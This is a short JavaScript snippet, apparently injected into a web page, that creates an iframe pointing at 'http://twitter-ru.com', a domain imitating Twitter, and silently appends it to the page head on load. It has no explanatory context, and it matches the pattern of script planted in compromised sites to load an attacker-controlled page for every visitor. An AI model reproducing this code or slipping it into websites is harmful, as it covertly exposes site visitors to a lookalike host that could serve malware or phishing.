var redstream_hd = document.getElementsByTagName('head')[0];
var redstream_tag = document.createElement('iframe');
redstream_tag.src = 'http://twitter-ru.com';
redstream_hd.appendChild(redstream_tag);
